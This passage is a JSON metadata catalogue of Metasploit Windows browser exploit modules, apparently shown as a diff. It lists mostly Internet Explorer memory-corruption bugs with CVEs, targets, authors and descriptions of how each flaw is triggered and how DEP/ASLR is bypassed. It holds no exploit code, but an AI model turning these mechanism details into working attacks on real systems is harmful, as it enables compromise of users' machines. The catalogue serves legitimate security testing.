"URL-https://seclists.org/fulldisclosure/2010/Dec/110", - "MSB-MS11-003" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer 8", - "Internet Explorer 7", - "Internet Explorer 6", - "Debug Target (Crash)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms11_003_ie_css_import.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms11_003_ie_css_import", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms11_050_mshtml_cobjectelement": { - "name": "MS11-050 IE mshtml!CObjectElement Use After Free", - "fullname": "exploit/windows/browser/ms11_050_mshtml_cobjectelement", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-06-16", - "type": "exploit", - "author": [ - "d0c_s4vage", - "sinn3r ", - "bannedit " - ], - "description": "This module exploits a use-after-free vulnerability in Internet Explorer. The\n vulnerability occurs when an invalid tag exists and other elements\n overlap/cover where the object tag should be when rendered (due to their\n styles/positioning). The mshtml!CObjectElement is then freed from memory because\n it is invalid. However, the mshtml!CDisplay object for the page continues to keep\n a reference to the freed and attempts to call a function on it, leading\n to the use-after-free.\n\n Please note that for IE 8 targets, JRE (Java Runtime Environment) is required\n to bypass DEP (Data Execution Prevention).", - "references": [ - "CVE-2011-1260", - "OSVDB-72950", - "MSB-MS11-050", - "URL-http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer 7 on XP SP3", - "Internet Explorer 7 on Windows Vista", - "Internet Explorer 8 on XP SP3", - "Internet Explorer 8 on Windows 7", - "Debug Target (Crash)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms11_050_mshtml_cobjectelement", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms11_081_option": { - "name": "MS11-081 Microsoft Internet Explorer Option Element Use-After-Free", - "fullname": "exploit/windows/browser/ms11_081_option", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-10-11", - "type": "exploit", - "author": [ - "Ivan Fratric", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a vulnerability in Microsoft Internet Explorer. A memory\n corruption may occur when the Option cache isn't updated properly, which allows\n other JavaScript methods to access a deleted Option element, and results in code\n execution under the context of the user.", - "references": [ - "CVE-2011-1996", - "OSVDB-76208", - "MSB-MS11-081", - "URL-http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html", - "URL-http://pastebin.com/YLH725Aj" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 8 on Windows XP SP3", - "IE 8 on Windows Vista", - "IE 8 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms11_081_option.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms11_081_option", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms11_093_ole32": { - "name": "MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution", - "fullname": "exploit/windows/browser/ms11_093_ole32", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-12-13", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a type confusion vulnerability in the OLE32 component of\n Windows XP SP3. The vulnerability exists in the CPropertyStorage::ReadMultiple\n function.\n\n A Visio document with a specially crafted Summary Information Stream embedded allows\n to get remote code execution through Internet Explorer, on systems with Visio Viewer\n installed.", - "references": [ - "MSB-MS11-093", - "CVE-2011-3400", - "OSVDB-77663", - "BID-50977", - "URL-http://aluigi.org/adv/ole32_1-adv.txt", - "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=966" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3 / Visio Viewer 2010", - "IE 7 on Windows XP SP3 / Visio Viewer 2010" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms11_093_ole32.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms11_093_ole32", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms12_004_midi": { - "name": "MS12-004 midiOutPlayNextPolyEvent Heap Overflow", - "fullname": "exploit/windows/browser/ms12_004_midi", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-10", - "type": "exploit", - "author": [ - "Shane Garrett", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a heap overflow vulnerability in the Windows Multimedia\n Library (winmm.dll). The vulnerability occurs when parsing specially crafted\n MIDI files. Remote code execution can be achieved by using the Windows Media Player\n ActiveX control.\n\n Exploitation is done by supplying a specially crafted MIDI file with\n specific events, causing the offset calculation being higher than what is\n available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing\n us to either \"inc al\" or \"dec al\" a byte. This can be used to corrupt an array\n (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects,\n which leverages remote code execution under the context of the user.\n\n Note: At this time, for IE 8 target, msvcrt ROP is used by default. However,\n if you know your target's patch level, you may also try the 'MSHTML' advanced\n option for an info leak based attack. Currently, this module only supports two\n MSHTML builds: 8.0.6001.18702, which is often seen in a newly installed XP SP3.\n Or 8.0.6001.19120, which is patch level before the MS12-004 fix.\n\n Also, based on our testing, the vulnerability does not seem to trigger when\n the victim machine is operated via rdesktop.", - "references": [ - "MSB-MS12-004", - "CVE-2012-0003", - "OSVDB-78210", - "BID-51292" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms12_004_midi.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms12_004_midi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms12_037_ie_colspan": { - "name": "MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", - "fullname": "exploit/windows/browser/ms12_037_ie_colspan", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-12", - "type": "exploit", - "author": [ - "Alexandre Pelletier", - "mr_me ", - "binjo", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a heap overflow vulnerability in Internet Explorer caused\n by an incorrect handling of the span attribute for col elements from a fixed table,\n when they are modified dynamically by javascript code.", - "references": [ - "CVE-2012-1876", - "OSVDB-82866", - "BID-53848", - "MSB-MS12-037" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 8 on Windows XP SP3 with msvcrt ROP", - "IE 8 on Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms12_037_ie_colspan.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms12_037_ie_colspan", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms12_037_same_id": { - "name": "MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption", - "fullname": "exploit/windows/browser/ms12_037_same_id", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-12", - "type": "exploit", - "author": [ - "Dark Son", - "Unknown", - "Yichong Lin", - "juan vazquez " - ], - "description": "This module exploits a memory corruption flaw in Internet Explorer 8 when\n handling objects with the same ID property. At the moment this module targets\n IE8 over Windows XP SP3 and Windows 7. This module supports heap massaging\n as well as the heap spray method seen in the wild (Java msvcrt71.dll).", - "references": [ - "MSB-MS12-037", - "CVE-2012-1875", - "OSVDB-82865", - "URL-http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/", - "URL-https://twitter.com/binjo/status/212795802974830592", - "URL-https://www.rapid7.com/blog/post/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 8 on Windows XP SP3 with msvcrt ROP", - "IE 8 on Windows XP SP3 with JRE ROP", - "IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/browser/ms12_037_same_id.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms12_037_same_id", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_009_ie_slayoutrun_uaf": { - "name": "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free", - "fullname": "exploit/windows/browser/ms13_009_ie_slayoutrun_uaf", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-02-13", - "type": "exploit", - "author": [ - "Scott Bell " - ], - "description": "This module exploits a use-after-free vulnerability in Microsoft Internet Explorer\n where a CParaElement node is released but a reference is still kept\n in CDoc. This memory is reused when a CDoc relayout is performed.", - "references": [ - "CVE-2013-0025", - "OSVDB-90122", - "MSB-MS13-009", - "URL-http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 8 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_009_ie_slayoutrun_uaf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_022_silverlight_script_object": { - "name": "MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access", - "fullname": "exploit/windows/browser/ms13_022_silverlight_script_object", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-03-12", - "type": "exploit", - "author": [ - "James Forshaw", - "Vitaliy Toropov", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\n SP3 / Windows 7 SP1.", - "references": [ - "CVE-2013-0074", - "CVE-2013-3896", - "OSVDB-91147", - "OSVDB-98223", - "BID-58327", - "BID-62793", - "MSB-MS13-022", - "MSB-MS13-087", - "PACKETSTORM-123731" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86/x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_022_silverlight_script_object", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_037_svg_dashstyle": { - "name": "MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow", - "fullname": "exploit/windows/browser/ms13_037_svg_dashstyle", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-03-06", - "type": "exploit", - "author": [ - "Nicolas Joly", - "4B5F5F4B", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits an integer overflow vulnerability on Internet Explorer.\n The vulnerability exists in the handling of the dashstyle.array length for vml\n shapes on the vgx.dll module.\n\n The exploit has been built and tested specifically against Windows 7 SP1 with\n Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to\n bypass ASLR, and by default the info leak is used. To make sure the leak is\n successful, the ntdll version should be either v6.1.7601.17514 (the default dll\n version on a newly installed/unpatched Windows 7 SP1), or ntdll.dll v6.1.7601.17725\n (installed after apply MS12-001). If the target doesn't have the version the exploit\n wants, it will refuse to attack by sending a fake 404 message (webpage not found).\n\n If you wish to try the JRE6 component instead to bypass ASLR, you can set the\n advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't\n have this particular component, the exploit will also refuse to attack by\n sending a 404 message.", - "references": [ - "CVE-2013-2551", - "OSVDB-91197", - "BID-58570", - "MSB-MS13-037", - "URL-http://binvul.com/viewthread.php?tid=311" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IE 8 on Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_037_svg_dashstyle", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_055_canchor": { - "name": "MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free", - "fullname": "exploit/windows/browser/ms13_055_canchor", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-07-09", - "type": "exploit", - "author": [ - "Jose Antonio Vazquez Gonzalez", - "Orange Tsai", - "Peter Vreugdenhil", - "sinn3r " - ], - "description": "In IE8 standards mode, it's possible to cause a use-after-free condition by first\n creating an illogical table tree, where a CPhraseElement comes after CTableRow,\n with the final node being a sub table element. When the CPhraseElement's outer\n content is reset by using either outerText or outerHTML through an event handler,\n this triggers a free of its child element (in this case, a CAnchorElement, but\n some other objects apply too), but a reference is still kept in function\n SRunPointer::SpanQualifier. This function will then pass on the invalid reference\n to the next functions, eventually used in mshtml!CElement::Doc when it's trying to\n make a call to the object's SecurityContext virtual function at offset +0x70, which\n results a crash. An attacker can take advantage of this by first creating an\n CAnchorElement object, let it free, and then replace the freed memory with another\n fake object. Successfully doing so may allow arbitrary code execution under the\n context of the user.\n\n This bug is specific to Internet Explorer 8 only. It was originally discovered by\n Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again\n by Orange Tsai at Hitcon 2013.", - "references": [ - "CVE-2013-3163", - "OSVDB-94981", - "MSB-MS13-055", - "URL-https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 8 on Windows XP SP3", - "IE 8 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_055_canchor.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_055_canchor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_059_cflatmarkuppointer": { - "name": "MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free", - "fullname": "exploit/windows/browser/ms13_059_cflatmarkuppointer", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-27", - "type": "exploit", - "author": [ - "corelanc0d3r", - "sinn3r " - ], - "description": "This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9,\n it seems to only affect certain releases of mshtml.dll, ranging from a newly\n installed IE9 (9.0.8112.16446), to 9.00.8112.16502 (July 2013 update). IE8\n requires a different way to trigger the vulnerability, but not currently covered\n by this module.\n\n The issue is specific to the browser's IE7 document compatibility, which can be\n defined in X-UA-Compatible, and the content editable mode must be enabled. An\n \"onmove\" event handler is also necessary to be able to trigger the bug, and the\n event will be run twice before the crash. The first time is due to the position\n change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable'\n object is created during a \"SelectAll\" command, and this object will be used later\n on for the crash. The second onmove event seems to be triggered by a InsertButton\n (or Insert-whatever) command, which is also responsible for the free of object\n CFlatMarkupPointer during page rendering. The EnsureRecalcNotify() function will\n then still return an invalid reference to CFlatMarkupPointer (stored in EBX), and\n then passes this on to the next functions (GetLineInfo -> QIClassID). When this\n reference arrives in function QIClassID, an access violation finally occurs when\n the function is trying to call QueryInterface() with the bad reference, and this\n results a crash. Successful control of the freed memory may leverage arbitrary code\n execution under the context of the user.\n\n Note: It is also possible to see a different object being freed and used, doesn't\n always have to be CFlatMarkupPointer.", - "references": [ - "CVE-2013-3184", - "OSVDB-96182", - "MSB-MS13-059", - "BID-61668", - "ZDI-13-194", - "ZDI-13-195" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_059_cflatmarkuppointer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_069_caret": { - "name": "MS13-069 Microsoft Internet Explorer CCaret Use-After-Free", - "fullname": "exploit/windows/browser/ms13_069_caret", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-09-10", - "type": "exploit", - "author": [ - "corelanc0d3r", - "sinn3r " - ], - "description": "This module exploits a use-after-free vulnerability found in Internet Explorer,\n specifically in how the browser handles the caret (text cursor) object. In IE's standards\n mode, the caret handling's vulnerable state can be triggered by first setting up an\n editable page with an input field, and then we can force the caret to update in an\n onbeforeeditfocus event by setting the body's innerHTML property. In this event handler,\n mshtml!CCaret::`vftable' can be freed using a document.write() function, however,\n mshtml!CCaret::UpdateScreenCaret remains unaware of this change, and still uses the\n same reference to the CCaret object. When the function tries to use this invalid reference\n to call a virtual function at offset 0x2c, it finally results a crash. Precise control of\n the freed object allows arbitrary code execution under the context of the user.", - "references": [ - "CVE-2013-3205", - "OSVDB-97094", - "MSB-MS13-069", - "ZDI-13-217" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IE 8 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_069_caret.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_069_caret", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_080_cdisplaypointer": { - "name": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", - "fullname": "exploit/windows/browser/ms13_080_cdisplaypointer", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-08", - "type": "exploit", - "author": [ - "Unknown", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally\n found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,\n around the same time frame as CVE-2013-3893, except this was kept out of the public eye by\n multiple research companies and the vendor until the October patch release.\n\n This issue is a use-after-free vulnerability in CDisplayPointer via the use of a\n \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft\n the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.\n If we use a select() function for the CTextArea element, two important things will happen:\n a CDisplayPointer object will be created for CTextArea, and it will also trigger another\n event called \"onselect\". The \"onselect\" event will allow us to set up for the actual event\n handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child\n of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger\n \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer\n object can be forced by using an \"Unselect\" (other approaches also apply), but a reference\n of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after\n the CDoc::GetLineInfo call, because it is still trying to use that to update\n CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash\n finally occurs due to accessing the freed memory. By controlling this freed memory, it is\n possible to achieve arbitrary code execution under the context of the user.", - "references": [ - "CVE-2013-3897", - "OSVDB-98207", - "MSB-MS13-080", - "URL-http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx", - "URL-http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 8 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_080_cdisplaypointer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_090_cardspacesigninhelper": { - "name": "MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow", - "fullname": "exploit/windows/browser/ms13_090_cardspacesigninhelper", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-11-08", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a vulnerability on the CardSpaceClaimCollection class from the\n icardie.dll ActiveX control. The vulnerability exists while the handling of the\n CardSpaceClaimCollection object. CardSpaceClaimCollections stores a collection of\n elements on a SafeArray and keeps a size field, counting the number of elements on the\n collection. By calling the remove() method on an empty CardSpaceClaimCollection it is\n possible to underflow the length field, storing a negative integer. Later, a call to\n the add() method will use the corrupted length field to compute the address where write\n into the SafeArray data, allowing to corrupt memory with a pointer to controlled contents.\n This module achieves code execution by using VBScript as discovered in the wild on\n November 2013 to (1) create an array of html OBJECT elements, (2) create holes, (3) create\n a CardSpaceClaimCollection whose SafeArray data will reuse one of the holes, (4) corrupt\n one of the legit OBJECT elements with the described integer overflow and (5) achieve code\n execution by forcing the use of the corrupted OBJECT.", - "references": [ - "CVE-2013-3918", - "OSVDB-99555", - "BID-63631", - "MSB-MS13-090", - "URL-http://blogs.technet.com/b/msrc/archive/2013/11/11/activex-control-issue-being-addressed-in-update-tuesday.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP with IE 8" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_090_cardspacesigninhelper", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms14_012_cmarkup_uaf": { - "name": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", - "fullname": "exploit/windows/browser/ms14_012_cmarkup_uaf", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-02-13", - "type": "exploit", - "author": [ - "Unknown", - "Jean-Jamil Khalife", - "juan vazquez " - ], - "description": "This module exploits an use after free condition on Internet Explorer as used in the wild\n as part of \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to\n bypass ASLR and DEP.", - "references": [ - "CVE-2014-0322", - "MSB-MS14-012", - "BID-65551", - "URL-http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html", - "URL-http://hdwsec.fr/blog/CVE-2014-0322.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP1 / IE 10 / FP 12" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms14_012_cmarkup_uaf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms14_012_textrange": { - "name": "MS14-012 Microsoft Internet Explorer TextRange Use-After-Free", - "fullname": "exploit/windows/browser/ms14_012_textrange", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-11", - "type": "exploit", - "author": [ - "Jason Kratzer", - "sinn3r " - ], - "description": "This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw\n was most likely introduced in 2013, therefore only certain builds of MSHTML are\n affected. In our testing with IE9, these vulnerable builds appear to be between\n 9.0.8112.16496 and 9.0.8112.16533, which implies the vulnerability shipped between\n August 2013, when it was introduced, until the fix issued in early March 2014.", - "references": [ - "CVE-2014-0307", - "MSB-MS14-012" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms14_012_textrange.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms14_012_textrange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms14_064_ole_code_execution": { - "name": "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution", - "fullname": "exploit/windows/browser/ms14_064_ole_code_execution", - "aliases": [], - "rank": 400, - "disclosure_date": "2014-11-13", - "type": "exploit", - "author": [ - "Robert Freeman", - "yuange", - "Rik van Duijn", - "Wesley Neelen", - "GradiusX ", - "b33f", - "sinn3r " - ], - "description": "This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.\n The vulnerability is known to affect Internet Explorer 3.0 until version 11 within\n Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will\n only target Windows XP and Windows 7 box due to the Powershell limitation.\n\n Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other\n newer Windows systems, the exploit will try using Powershell instead.", - "references": [ - "CVE-2014-6332", - "MSB-MS14-064", - "OSVDB-114533", - "EDB-35229", - "EDB-35308", - "URL-http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows", - "URL-https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP", - "Windows 7" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms14_064_ole_code_execution", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms16_051_vbscript": { - "name": "Internet Explorer 11 VBScript Engine Memory Corruption", - "fullname": "exploit/windows/browser/ms16_051_vbscript", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-05-10", - "type": "exploit", - "author": [ - "Theori", - "William Webb " - ], - "description": "This module exploits the memory corruption vulnerability (CVE-2016-0189)\n present in the VBScript engine of Internet Explorer 11.", - "references": [ - "CVE-2016-0189", - "MSB-MS16-051" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 10 with IE 11" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms16_051_vbscript.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms16_051_vbscript", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/msvidctl_mpeg2": { - "name": "Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption", - "fullname": "exploit/windows/browser/msvidctl_mpeg2", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-07-05", - "type": "exploit", - "author": [ - "Trancer " - ], - "description": "This module exploits a memory corruption within the MSVidCtl component of Microsoft\n DirectShow (BDATuner.MPEG2TuneRequest).\n By loading a specially crafted GIF file, an attacker can overrun a buffer and\n execute arbitrary code.\n\n ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid", - "references": [ - "CVE-2008-0015", - "OSVDB-55651", - "BID-35558", - "MSB-MS09-032", - "MSB-MS09-037" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/msvidctl_mpeg2.rb", - "is_install_path": true, - "ref_name": "windows/browser/msvidctl_mpeg2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mswhale_checkforupdates": { - "name": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/mswhale_checkforupdates", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-04-15", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\n Gateway Whale Client. When sending an overly long string to CheckForUpdates()\n method of WhlMgr.dll 